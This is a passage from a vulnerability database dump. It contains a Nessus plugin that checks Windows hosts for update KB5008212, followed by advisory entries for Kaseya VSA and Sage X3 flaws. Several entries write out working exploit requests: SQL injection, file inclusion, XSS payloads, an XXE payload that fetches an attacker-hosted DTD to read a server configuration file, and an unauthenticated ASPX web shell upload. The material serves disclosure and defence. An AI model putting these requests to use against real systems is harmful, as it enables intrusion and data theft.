CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-43216, CVE-2021-43222, CVE-2021-43224, CVE-2021-43227, CVE-2021-43235, CVE-2021-43236, CVE-2021-43244)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-43219, CVE-2021-43228, CVE-2021-43246)", "cvss3": {}, "published": "2021-12-14T00:00:00", "type": "nessus", "title": "KB5008212: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 / Windows 10 Version 21H2 Security Update (December 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43244", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_DEC_5008212.NASL", "href": "https://www.tenable.com/plugins/nessus/156065", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156065);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-34527\",\n \"CVE-2021-41333\",\n \"CVE-2021-43207\",\n \"CVE-2021-43215\",\n \"CVE-2021-43216\",\n \"CVE-2021-43217\",\n \"CVE-2021-43219\",\n \"CVE-2021-43222\",\n \"CVE-2021-43223\",\n \"CVE-2021-43224\",\n \"CVE-2021-43226\",\n \"CVE-2021-43227\",\n \"CVE-2021-43228\",\n \"CVE-2021-43229\",\n \"CVE-2021-43230\",\n \"CVE-2021-43231\",\n \"CVE-2021-43232\",\n \"CVE-2021-43233\",\n \"CVE-2021-43234\",\n \"CVE-2021-43235\",\n \"CVE-2021-43236\",\n \"CVE-2021-43237\",\n \"CVE-2021-43238\",\n \"CVE-2021-43239\",\n \"CVE-2021-43240\",\n \"CVE-2021-43244\",\n \"CVE-2021-43246\",\n \"CVE-2021-43247\",\n \"CVE-2021-43248\",\n \"CVE-2021-43883\",\n \"CVE-2021-43893\"\n );\n script_xref(name:\"MSKB\", value:\"5008212\");\n script_xref(name:\"MSFT\", value:\"MS21-5008212\");\n script_xref(name:\"IAVA\", value:\"2021-A-0586-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0582-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5008212: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 / Windows 10 Version 21H2 Security Update (December 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5008212.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41333, CVE-2021-43207, CVE-2021-43223,\n CVE-2021-43226, CVE-2021-43229, CVE-2021-43230,\n CVE-2021-43231, CVE-2021-43237, CVE-2021-43238,\n CVE-2021-43239, CVE-2021-43240, CVE-2021-43247,\n CVE-2021-43248, CVE-2021-43883, CVE-2021-43893)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43215,\n CVE-2021-43217, CVE-2021-43232, CVE-2021-43233,\n CVE-2021-43234)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236, CVE-2021-43244)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228, CVE-2021-43246)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008212\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5008212.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-12\";\nvar kbs = make_list('5008212');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19041',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212])\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19042',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19043',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n\n|| \n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'19044',\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008212]) \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-11-22T00:47:31", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Sql injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-29T18:59:00", "id": "PRION:CVE-2021-30117", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30117", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:47:32", "description": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30118", "CVE-2021-30121"], "modified": "2022-04-29T18:57:00", "id": "PRION:CVE-2021-30121", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30121", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T01:46:10", "description": "Sage X3 Installation Pathname Disclosure. A specially crafted packet can elicit a response from the AdxDSrv.exe component that reveals the installation directory of the product. Note that this vulnerability can be combined with CVE-2020-7388 to achieve full RCE. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-07-22T19:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-09T17:20:00", "id": "PRION:CVE-2020-7387", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-7387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T01:46:09", "description": "Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-09T17:33:00", "id": "PRION:CVE-2020-7388", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-7388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:47:32", "description": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";</script><script>alert(1);a=\"&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30119"], "modified": "2022-04-29T18:15:00", "id": "PRION:CVE-2021-30119", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30119", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T00:47:41", "description": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword>  <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"> <!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30201"], "modified": "2022-04-29T18:14:00", "id": "PRION:CVE-2021-30201", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30201", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T00:47:32", "description": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30120"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-30120", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30120", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T00:47:31", "description": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %> <%@ Import namespace=\"System.Web.UI.WebControls\" %> <%@ Import namespace=\"System.Diagnostics\" %> <%@ Import namespace=\"System.IO\" %> <%@ Import namespace=\"System\" %> <%@ Import namespace=\"System.Data\" %> <%@ Import namespace=\"System.Data.SqlClient\" %> <%@ Import namespace=\"System.Security.AccessControl\" %> <%@ Import namespace=\"System.Security.Principal\" %> <%@ Import namespace=\"System.Collections.Generic\" %> <%@ Import namespace=\"System.Collections\" %> <script runat=\"server\"> private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "prion", "title": "Authentication flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30118"], "modified": "2022-04-29T18:59:00", "id": "PRION:CVE-2021-30118", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-30118", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T00:47:31", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp 